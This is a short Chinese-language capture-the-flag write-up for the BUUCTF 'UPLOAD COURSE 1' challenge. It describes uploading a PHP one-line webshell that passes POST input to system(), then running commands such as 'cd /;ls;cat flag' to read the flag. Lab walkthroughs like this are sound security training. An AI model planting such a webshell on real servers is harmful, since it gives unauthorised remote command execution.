buuctf BUU UPLOAD COURSE 1 1

今天做了一个buuctf的题感觉有点意思

 

 

进来过后是这个页面

 

很明显是要上传一个文件，然后再访问这个文件里的木马，都是老套路了

 

 然后惊奇的发现居然是jpg后缀，在burp后改了后缀上传上去也是不能变，然后我们访问一下这个文件，发现里面的代码还是可以执行的，

这就有意思了，我们上传这个一句话木马，命名为妹妹.php；直接上传

 

<?php @eval(system($_POST["x"]));?>

在这个代码里面多了个system()函数，这个函数可以执行命令，要是不懂可以看看官方的资料

 

 在hackbar那用post传参进行命令执行；很方便啊哈哈哈；

这里还是借鉴了大佬的b博客

https://www.cnblogs.com/zhwyyswdg/p/14076413.html

但是我没有用postman，我的干不起，就直接点；

要是我们直接在这个目录下查看的话是看不到flag的；

 

 我们需要 回到根目录下才能看到我们想要的东西，也有肯能不让我们访问根目录，我们就直接，cd /;cat flag;

cd /;ls;cat flag